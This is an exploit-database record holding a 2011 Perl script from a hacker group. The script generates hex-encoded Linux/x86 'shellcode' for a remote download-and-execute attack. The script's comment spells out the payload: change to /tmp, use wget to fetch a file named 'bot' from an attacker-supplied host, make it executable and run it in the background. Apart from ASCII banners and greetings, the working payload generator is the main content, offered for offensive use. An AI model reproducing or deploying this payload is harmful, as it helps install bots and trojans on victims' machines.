{"type": "zdt", "lastseen": "2016-04-20T02:30:59", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "linux/x86 Remote Download/Execute File - 44 Bytes + File", "published": "2011-05-04T00:00:00", "href": "http://0day.today/exploit/description/16028", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for linux/x86 platform in category shellcode", "hash": "4b31e5b49675d17b097a88dd02a4d0734054ae565004fedaf92485ca0f4dffe4", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ######################################### 1\r\n0 I'm KedAns-Dz member from Inj3ct0r Team 1\r\n1 ######################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n#!/usr/bin/perl\r\nsub logo(){\r\nprint q' \r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n1 ______ 0\r\n0 .-\" \"-. 1\r\n1 / KedAns-Dz \\ =-=-=-=-=-=-=-=-=-=-=-| 0\r\n0 Algerian HaCker | | > Site : 1337day.com | 1\r\n1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0\r\n0 | )(_o/ \\o_)( | > ked-h@hotmail.com | 1\r\n1 |/ /\\ \\| =-=-=-=-=-=-=-=-=-=-=| 0\r\n0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1\r\n1 _ ) \\_______\\__|IIIIII|__/_______________________ 0\r\n0 (_)@8@8{}<________|-\\IIIIII/-|________________________> 1\r\n1 )_/ \\ / 0\r\n0 (@ `--------` \u00c2\u00a9 2011, Inj3ct0r Team 1\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0\r\n0 Shellcode Linux/x86 Remote Download/Execute File - 44 Bytes + File 1\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0\r\n';\r\n}\r\n###\r\n# Shellcode Linux/x86 Remote Download/Execute File - 44 Bytes + File\r\n# Platform (Linux) - ARCH (x86) - Type (Shellcode)\r\n# Tested on : Linux/x86 - Ubuntu - (10.10 & 8.14 'BT4')\r\n# Provided By : KedAns-Dz\r\n##\r\n# Unreal IRCD 3.2.8.1 Remote Download/Execute\r\n# Real Provider (anonymous) > http://exploit-db.com/exploits/13853\r\n###\r\nlogo();\r\n$ARGC=@ARGV;\r\nif ($ARGC!=1) { \r\n print \"\\n [!] Usage: $0 [Tr0j4n3-HoSt] \\n\"; \r\n die \" [*] f.ex: $0 http://1337day.com/attack.txt \\n\";\r\n}\r\nmy $FILE = shift;\r\nmy $leng = length($FILE)+44; # 44 - default length of shellcode\r\nmy $shellcode = # cd /tmp; wget [TroJ4n3-HoSt] -O bot; chmod +x bot; ./bot &\r\n'\\x63\\x64\\x20\\x2f\\x74\\x6d\\x70\\x3b\\x20\\x77\\x67\\x65\\x74\\x20'.$FILE.\r\n'\\x20\\x2d\\x4f\\x20\\x62\\x6f\\x74\\x3b\\x20\\x63\\x68\\x6d\\x6f\\x64\\x20\\x2b'.\r\n'\\x78\\x20\\x62\\x6f\\x74\\x3b\\x20\\x2e\\x2f\\x62\\x6f\\x74\\x20\\x26';\r\nprint\"\\n\\n [+] File : \".$FILE.\"\\n [+] Length : \".$leng.\" Bytes\\n [+] Shellcode :\\n\\n\".$shellcode.\"\\n\";\r\n\r\n#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== \r\n# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >\r\n# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) \r\n# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *\r\n# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... \r\n# Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org) \r\n# JaGo-Dz (sec4ever.com) * KelvinX (kelvinx.net) * PaCketStorm Team (www.packetstormsecurity.org)\r\n# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...\r\n#================================================================================================\r\n\r\n\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-16028", "sourceHref": "http://0day.today/exploit/16028", "modified": "2011-05-04T00:00:00", "reporter": "KedAns-Dz", "enchantments": {"vulnersScore": 6.0}}

{"result": {}}